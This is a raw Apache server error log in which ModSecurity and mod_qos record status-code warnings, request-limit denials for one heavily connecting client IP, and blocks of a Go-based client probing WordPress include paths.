[Tue May 26 20:00:13.302011 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aRQAAALQ"]
[Tue May 26 20:00:13.302346 2026] [security2:error] [pid 106517:tid 106762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aPwAAAPQ"]
[Tue May 26 20:00:13.309310 2026] [security2:error] [pid 106517:tid 106760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aRAAAAPI"]
[Tue May 26 20:00:13.314804 2026] [security2:error] [pid 106517:tid 106744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aMgAAAOI"]
[Tue May 26 20:00:13.320122 2026] [security2:error] [pid 93576:tid 93742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc2DRMqfxdEDkosz9nwAAAB4"]
[Tue May 26 20:00:13.328736 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aUgAAANM"]
[Tue May 26 20:00:13.336844 2026] [security2:error] [pid 106517:tid 106656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aSQAAAIs"]
[Tue May 26 20:00:13.337271 2026] [security2:error] [pid 93576:tid 93760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz9-QAAADA"]
[Tue May 26 20:00:13.345750 2026] [security2:error] [pid 93576:tid 93780] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc2DRMqfxdEDkosz9qwAAAEQ"]
[Tue May 26 20:00:13.348253 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aWgAAALc"]
[Tue May 26 20:00:13.349194 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc2DRMqfxdEDkosz9pQAAAGU"]
[Tue May 26 20:00:13.368901 2026] [security2:error] [pid 106517:tid 106707] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aXwAAAL0"]
[Tue May 26 20:00:13.370432 2026] [security2:error] [pid 106517:tid 106730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aTQAAANQ"]
[Tue May 26 20:00:13.374710 2026] [security2:error] [pid 93576:tid 93777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc2DRMqfxdEDkosz9rAAAAEE"]
[Tue May 26 20:00:13.374727 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc2DRMqfxdEDkosz9pgAAAB8"]
[Tue May 26 20:00:13.376462 2026] [security2:error] [pid 93576:tid 93810] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-AAAAAGI"]
[Tue May 26 20:00:13.376699 2026] [security2:error] [pid 106517:tid 106724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aSgAAAM4"]
[Tue May 26 20:00:13.402849 2026] [security2:error] [pid 93576:tid 93837] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-AwAAAH0"]
[Tue May 26 20:00:13.410354 2026] [security2:error] [pid 106517:tid 106687] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1apwAAAKk"]
[Tue May 26 20:00:13.411733 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1apgAAAOY"]
[Tue May 26 20:00:13.413836 2026] [security2:error] [pid 106517:tid 106662] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1aqAAAAJE"]
[Tue May 26 20:00:13.418424 2026] [security2:error] [pid 106517:tid 106709] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1aoAAAAL8"]
[Tue May 26 20:00:13.434395 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1arAAAAN0"]
[Tue May 26 20:00:13.436989 2026] [security2:error] [pid 106517:tid 106686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1aowAAAKg"]
[Tue May 26 20:00:13.437914 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuc4ZZc2DoU1lPnP1aXAAAAQQ"]
[Tue May 26 20:00:13.439412 2026] [security2:error] [pid 106517:tid 106768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1asgAAAPo"]
[Tue May 26 20:00:13.441963 2026] [security2:error] [pid 106517:tid 106742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1aqQAAAOA"]
[Tue May 26 20:00:13.449799 2026] [security2:error] [pid 106517:tid 106652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1arQAAAIc"]
[Tue May 26 20:00:13.455231 2026] [security2:error] [pid 106517:tid 106670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1aqgAAAJk"]
[Tue May 26 20:00:13.458318 2026] [security2:error] [pid 93576:tid 93751] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-CAAAACc"]
[Tue May 26 20:00:13.478121 2026] [security2:error] [pid 106517:tid 106663] [client 103.163.220.49:49437] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Text/"] [unique_id "ahWudYZZc2DoU1lPnP1a7gAAAJI"]
[Tue May 26 20:00:13.585803 2026] [qos:error] [pid 106517:tid 106743] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWudYZZc2DoU1lPnP1bEgAAAOE
[Tue May 26 20:00:13.591771 2026] [qos:error] [pid 93576:tid 93788] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-bAAAAEw
[Tue May 26 20:00:13.591963 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-bQAAADI
[Tue May 26 20:00:13.592652 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-bwAAADI
[Tue May 26 20:00:13.594677 2026] [qos:error] [pid 93576:tid 93820] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-cAAAAGw
[Tue May 26 20:00:13.599718 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-cQAAAH0
[Tue May 26 20:00:13.609298 2026] [qos:error] [pid 106517:tid 106746] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudYZZc2DoU1lPnP1bFAAAAOQ
[Tue May 26 20:00:13.610212 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-cwAAAEA
[Tue May 26 20:00:13.611928 2026] [qos:error] [pid 93576:tid 93805] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-dAAAAF0
[Tue May 26 20:00:13.734011 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-eAAAAEU
[Tue May 26 20:00:13.744340 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-eQAAABE
[Tue May 26 20:00:13.745905 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-egAAAB0
[Tue May 26 20:00:13.747281 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-ewAAAAA
[Tue May 26 20:00:13.748440 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-fAAAAA0
[Tue May 26 20:00:13.753407 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-fQAAACg
[Tue May 26 20:00:13.761343 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-fgAAABM
[Tue May 26 20:00:13.764038 2026] [qos:error] [pid 106517:tid 106699] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudYZZc2DoU1lPnP1bGAAAALU
[Tue May 26 20:00:13.766799 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-fwAAAG8
[Tue May 26 20:00:13.881937 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-gQAAAFE
[Tue May 26 20:00:13.889172 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-ggAAABg
[Tue May 26 20:00:13.897621 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-gwAAAHk
[Tue May 26 20:00:13.898233 2026] [qos:error] [pid 93576:tid 93773] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-hAAAAD0
[Tue May 26 20:00:13.901463 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-hQAAABQ
[Tue May 26 20:00:13.902400 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-hgAAAE4
[Tue May 26 20:00:13.904724 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-hwAAAEQ
[Tue May 26 20:00:13.909269 2026] [qos:error] [pid 93576:tid 93817] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-iQAAAGk
[Tue May 26 20:00:13.920012 2026] [qos:error] [pid 106517:tid 106713] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudYZZc2DoU1lPnP1bHQAAAMM
[Tue May 26 20:00:13.923352 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudWDRMqfxdEDkosz-jQAAAC4
[Tue May 26 20:00:13.969493 2026] [security2:error] [pid 106517:tid 106735] [client 103.163.220.11:22351] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/assets/"] [unique_id "ahWudYZZc2DoU1lPnP1bHgAAANk"]
[Tue May 26 20:00:14.029827 2026] [qos:error] [pid 93576:tid 93762] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-kAAAADI
[Tue May 26 20:00:14.039863 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-kQAAABo
[Tue May 26 20:00:14.049861 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-lAAAAEA
[Tue May 26 20:00:14.049940 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-kwAAAH0
[Tue May 26 20:00:14.055422 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-lgAAAAQ
[Tue May 26 20:00:14.056126 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-lwAAAD4
[Tue May 26 20:00:14.056233 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-mAAAAAQ
[Tue May 26 20:00:14.056777 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-mQAAAD4
[Tue May 26 20:00:14.073569 2026] [qos:error] [pid 106517:tid 106693] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudoZZc2DoU1lPnP1bIwAAAK8
[Tue May 26 20:00:14.078000 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-mwAAAEU
[Tue May 26 20:00:14.177912 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-nAAAAA0
[Tue May 26 20:00:14.190992 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:55364] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-nQAAACg
[Tue May 26 20:00:14.201105 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:58080] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-oAAAAG8
[Tue May 26 20:00:14.202104 2026] [qos:error] [pid 93576:tid 93742] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-oQAAAB4
[Tue May 26 20:00:14.204590 2026] [qos:error] [pid 93576:tid 93750] [client 45.148.10.120:35152] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-owAAACY
[Tue May 26 20:00:14.209426 2026] [qos:error] [pid 93576:tid 93821] [client 45.148.10.120:58114] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-pQAAAG0
[Tue May 26 20:00:14.212241 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35150] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-pgAAAFE
[Tue May 26 20:00:14.212852 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-pwAAABg
[Tue May 26 20:00:14.227757 2026] [qos:error] [pid 106517:tid 106730] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudoZZc2DoU1lPnP1bJgAAANQ
[Tue May 26 20:00:14.233719 2026] [qos:error] [pid 93576:tid 93732] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWudmDRMqfxdEDkosz-qQAAABQ
[Tue May 26 20:00:14.300923 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1aswAAANc"]
[Tue May 26 20:00:14.309889 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1arwAAAM8"]
[Tue May 26 20:00:14.321347 2026] [security2:error] [pid 93576:tid 93830] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-GAAAAHY"]
[Tue May 26 20:00:14.325826 2026] [security2:error] [pid 93576:tid 93769] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-CQAAADk"]
[Tue May 26 20:00:14.338804 2026] [security2:error] [pid 93576:tid 93826] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-OQAAAHI"]
[Tue May 26 20:00:14.344041 2026] [security2:error] [pid 93576:tid 93816] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudWDRMqfxdEDkosz-IAAAAGg"]
[Tue May 26 20:00:14.344363 2026] [security2:error] [pid 106517:tid 106717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1axQAAAMc"]
[Tue May 26 20:00:14.347004 2026] [security2:error] [pid 106517:tid 106708] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1augAAAL4"]
[Tue May 26 20:00:14.347999 2026] [security2:error] [pid 106517:tid 106738] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWudYZZc2DoU1lPnP1avgAAANw"]
